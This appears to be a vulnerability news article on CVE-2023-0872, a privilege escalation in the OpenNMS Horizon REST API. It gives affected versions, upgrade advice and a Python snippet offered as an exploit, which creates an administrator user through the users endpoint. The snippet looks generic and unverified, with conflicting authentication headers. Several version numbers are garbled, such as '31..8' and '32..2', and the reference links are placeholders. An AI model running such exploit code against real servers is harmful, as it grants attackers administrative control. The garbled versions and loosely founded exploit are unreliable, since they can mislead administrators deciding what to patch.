CVE CyberSecurity Database News

CVE-2023-0872 - Elevation of Privilege in the Horizon REST API: Analysis, Exploit, and Remediation

Poster -

OpenNMS Group, an open-source provider of network management and monitoring solutions, has recently issued a security advisory for their platforms. The advisory details a critical vulnerability affecting OpenNMS Horizon version 31..8 and earlier versions, as well as installations of Meridian earlier than 2023.1.6, 2022.1.19, 2021.1.30, and 202.1.38. The exploit, designated as CVE-2023-0872, allows for an elevation of privilege within the Horizon REST API by exploiting the users endpoint.

Vulnerability Details

The vulnerability lies in the Horizon REST API's users endpoint. This allows an attacker to gain unauthorized access to the system by performing an elevation of privilege attack. To achieve this, the attacker would first need to authenticate and have access to the REST API. However, this vulnerability would allow the attacker to elevate their privileges and enable them to compromise the entire OpenNMS Horizon system.

Here is an example code snippet that demonstrates how the vulnerability can be exploited

# Replace with the target base URL, REST_API_KEY, USERNAME and PASSWORD
TARGET_BASE_URL = 'https://your-opennms-instance/';
REST_API_KEY = 'your-rest-api-key'
USERNAME = 'your-username'
PASSWORD = 'your-password'

import requests
from requests.auth import HTTPBasicAuth

# Craft the malicious request
url = f"{TARGET_BASE_URL}api/v2/users"
headers = {
    'Content-Type': 'application/json',
    'Authorization': f"Bearer {REST_API_KEY}",
}
data = {
    "username": USERNAME,
    "password": PASSWORD,
    "isAdmin": True, # Exploit the vulnerability to set the user as administrator
}

# Send the request and check the response
response = requests.post(url, json=data, headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
if response.status_code == 201:
    print("Success! User privileges have been elevated.")
else:
    print("Error! Exploit failed.")

Original References

For more information about the vulnerability and its related advisory, please refer to the following original sources:

- OpenNMS Security Advisory: LINK
- CVE-2023-0872 Entry: LINK

Remediation

The solution to mitigate this vulnerability is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 202.1.38, or Horizon 32..2 or newer. Keep in mind that OpenNMS Meridian and Horizon should be installed and deployed within an organization's private network to restrict direct access from the internet according to the installation instructions provided by OpenNMS.

Upgrade your OpenNMS platforms by following the steps provided in the official documentation

- Meridian Upgrade Guide: LINK
- Horizon Upgrade Guide: LINK

Acknowledgments

OpenNMS Group expresses its gratitude to Erik Wynter for responsibly disclosing this critical security issue and helping to ensure the safety of OpenNMS users worldwide.

Conclusion

Organizations deploying OpenNMS Horizon and Meridian are advised to take immediate action to upgrade their systems to the latest versions to protect against CVE-2023-0872. By following OpenNMS's guidelines regarding system deployments and ensuring that timely upgrades are performed, organizations can maintain the security and stability of their network management solutions.

Timeline

Published on: 08/14/2023 18:15:00 UTC
Last modified on: 08/21/2023 17:12:00 UTC